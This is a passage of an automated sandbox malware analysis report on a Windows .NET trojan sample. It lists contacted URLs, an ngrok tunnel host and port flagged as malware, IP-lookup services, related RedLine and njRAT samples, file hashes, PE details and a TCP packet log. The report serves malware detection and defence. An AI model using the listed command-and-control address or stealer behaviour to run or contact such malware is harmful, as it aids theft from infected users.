                  http://tempuri.org/00%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponse1%VirustotalBrowse
                  http://0.tcp.in.ngrok.io:17383/.100%Avira URL Cloudmalware
                  http://tempuri.org/Endpoint/GetUpdatesLR2%VirustotalBrowse
                  http://0.tcp.in.ngrok.io:17383/9%VirustotalBrowse
                  http://0.tcp.in.ngrok.io:173839%VirustotalBrowse
                  http://tempuri.org/00%VirustotalBrowse
                  http://0.tcp.in.ngrok.io:17383/.9%VirustotalBrowse
                  http://tempuri.org/Endpoint/VerifyUpdateLR2%VirustotalBrowse
                  http://tempuri.org/Endpoint/CheckConnectT2%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  0.tcp.in.ngrok.io
                  		3.6.115.182
                  		truefalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://0.tcp.in.ngrok.io:17383/false
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ipinfo.io/ip%appdata%kuEfaZxkiY.exefalse
                    		high
                    http://tempuri.org/Endpoint/CheckConnectLRkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymouskuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://tempuri.org/Endpoint/CheckConnectResponsekuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%kuEfaZxkiY.exefalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/soap/envelope/kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://tempuri.org/kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Endpoint/CheckConnectkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Endpoint/EnvironmentSettingsLRkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Endpoint/VerifyUpdateResponsekuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Endpoint/8kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Endpoint/SetEnvironmentResponsekuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://tempuri.org/Endpoint/SetEnvironmentLRkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://dashboard.ngrok.comkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E64000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6D000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC3000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.ipify.orgcookies//settinString.RemovegkuEfaZxkiY.exefalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/08/addressingkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://tempuri.org/Endpoint/GetUpdatesLRkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://tempuri.org/Endpoint/VerifyUpdateLRkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://tempuri.org/Endpoint/GetUpdatesResponsekuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://0.tcp.in.ngrok.io:17383kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 9%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              http://0.tcp.in.ngrok.iokuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 9%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              http://tempuri.org/Endpoint/kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://tempuri.org/Endpoint/EnvironmentSettingsResponsekuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://tempuri.org/Endpoint/CheckConnectTkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 2%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://tempuri.org/0kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://0.tcp.in.ngrok.io:17383/.kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 9%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/soap/actor/nextkuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  3.6.115.182
                                  		0.tcp.in.ngrok.ioUnited States
                                  		16509AMAZON-02USfalse

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1393953
                                  Start date and time:2024-02-17 20:41:06 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 34s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:6
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:kuEfaZxkiY.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:117EEF8A227E6CE3646718D0ED6FB7B1.exe
                                  Detection:MAL
                                  Classification:mal96.troj.winEXE@2/0@1/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 3
                                  • Number of non-executed functions: 1
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3.6.115.182RN2vknsx6G.exeGet hashmaliciousRedLineBrowse
                                  • 0.tcp.in.ngrok.io:17440/

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  0.tcp.in.ngrok.ioae6T8jJueq.exeGet hashmaliciousNjratBrowse
                                  • 3.6.115.64
                                  nOZ2Oqnzbz.exeGet hashmaliciousNjratBrowse
                                  • 3.6.115.64
                                  iR2UtZj5vP.exeGet hashmaliciousNjratBrowse
                                  • 3.6.122.107
                                  ZB7Ot9MOic.exeGet hashmaliciousNjratBrowse
                                  • 3.6.30.85
                                  etJZk4UQhS.exeGet hashmaliciousNjratBrowse
                                  • 3.6.122.107
                                  jango.exeGet hashmaliciousXWormBrowse
                                  • 3.6.30.85
                                  cracksetup.exeGet hashmaliciousNanocoreBrowse
                                  • 3.6.98.232
                                  LocalStaFvjUblU.exeGet hashmaliciousnjRatBrowse
                                  • 3.6.122.107
                                  558EofiXYO.exeGet hashmaliciousnjRatBrowse
                                  • 3.6.115.64
                                  JsYdl3ZkOA.exeGet hashmaliciousnjRatBrowse
                                  • 3.6.115.64

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  AMAZON-02USJccyJc1Lds.exeGet hashmaliciousNjratBrowse
                                  • 3.125.102.39
                                  ttbvIbUgTq.elfGet hashmaliciousUnknownBrowse
                                  • 130.176.250.126
                                  ZDKv0w0UwA.elfGet hashmaliciousUnknownBrowse
                                  • 13.50.181.194
                                  rl140Y9jeD.elfGet hashmaliciousMiraiBrowse
                                  • 18.176.199.54
                                  jew.arm7.elfGet hashmaliciousMiraiBrowse
                                  • 18.153.210.61
                                  NS5jNpjR8t.elfGet hashmaliciousMiraiBrowse
                                  • 34.245.185.212
                                  Np14MVqF0i.elfGet hashmaliciousMiraiBrowse
                                  • 54.119.199.8
                                  b4ngl4d3shS3N941.x86.elfGet hashmaliciousUnknownBrowse
                                  • 34.249.145.219
                                  b4ngl4d3shS3N941.mips.elfGet hashmaliciousUnknownBrowse
                                  • 54.247.62.1
                                  jew.arm7.elfGet hashmaliciousMiraiBrowse
                                  • 52.35.208.171

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):5.960239123976663
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Windows Screen Saver (13104/52) 0.07%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  File name:kuEfaZxkiY.exe
                                  File size:97'792 bytes
                                  MD5:117eef8a227e6ce3646718d0ed6fb7b1
                                  SHA1:db6e21bf637604aa0be4f73142a1b7447cc83553
                                  SHA256:80488bf5f30ea2398ff207b9045a0e230aff2d052ea56156a0e96b57784dc0e5
                                  SHA512:b889b1b965251c74776d3f8981f042f6364157d3c3049e59ad3fbd12dc5d95b938db37870b2bb0de6781e7ee48c0a6cf80318b31b60b6df2be96241a34d478a1
                                  SSDEEP:1536:Fqsgaq+A/lbG6jejoigIP43Ywzi0Zb78ivombfexv0ujXyyed2z3teulgS6pQl:DfZeYP+zi0ZbYe1g0ujyzdfQ
                                  TLSH:B0A35D2067AC9F19EAFD1B74B4B2012043F1E08A9091FB4B4DC154E71FA7B865957EF2
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........>.... ........@.. ....................................@................................

                                  File Icon

                                  Icon Hash:90cececece8e8eb0

                                  Static PE Info

                                  General

                                  Entrypoint:0x41933e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows cui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x192e80x53.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x4de.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c0000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x173440x1740038e22ac8e4d3010d0b39c201a2c0ce18False0.4487567204301075data6.015291136298434IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0x1a0000x4de0x600e3145af1e7dfa1e41fe7799ae002b612False0.3756510416666667data3.723940100220831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x1c0000xc0x20089ebbf373068a00e5c68d2ac72a26374False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_VERSION0x1a0a00x254data0.4597315436241611
                                  RT_MANIFEST0x1a2f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Feb 17, 2024 20:42:01.792113066 CET4972917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:02.070998907 CET17383497293.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:02.071491003 CET4972917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:02.091609955 CET4972917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:02.354696989 CET17383497293.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:02.355135918 CET4972917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:02.366194010 CET4972917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:02.367120028 CET4973017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:02.370184898 CET17383497293.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:02.633975029 CET17383497293.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:02.644026995 CET17383497303.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:02.644282103 CET4973017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:02.644577026 CET4973017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:02.644800901 CET17383497293.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:02.921449900 CET17383497303.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:02.925757885 CET17383497303.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:02.925976038 CET4973017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:02.926309109 CET4973017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:03.204368114 CET17383497303.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:07.951719046 CET4973117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:08.228625059 CET17383497313.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:08.228920937 CET4973117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:08.229341984 CET4973117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:08.507121086 CET17383497313.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:08.507185936 CET17383497313.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:08.507227898 CET17383497313.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:08.508773088 CET4973217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:08.786103010 CET17383497323.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:08.786590099 CET4973217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:08.787210941 CET4973217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:09.063839912 CET17383497323.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:09.063874006 CET17383497323.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:09.063890934 CET17383497323.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:09.064066887 CET4973217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:09.065391064 CET4973217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:09.345135927 CET17383497323.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:09.346069098 CET17383497323.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:14.076436996 CET4973317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:14.347162962 CET17383497333.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:14.347407103 CET4973317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:14.347752094 CET4973317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:14.618899107 CET17383497333.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:14.618962049 CET17383497333.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:14.618987083 CET17383497333.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:14.620450974 CET4973417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:14.897140026 CET17383497343.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:14.897476912 CET4973417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:14.897855997 CET4973417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:15.174422026 CET17383497343.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:15.174482107 CET17383497343.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:15.174520016 CET17383497343.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:15.174587965 CET4973417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:15.174747944 CET4973417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:15.451549053 CET17383497343.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:15.451616049 CET17383497343.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:20.185735941 CET4973817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:20.462649107 CET17383497383.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:20.462809086 CET4973817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:20.463119030 CET4973817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:20.739754915 CET17383497383.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:20.739814043 CET17383497383.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:20.739851952 CET17383497383.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:20.741075993 CET4974017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:21.012978077 CET17383497403.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:21.013071060 CET4974017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:21.013288975 CET4974017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:21.286633968 CET17383497403.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:21.286698103 CET17383497403.6.115.182192.168.2.4
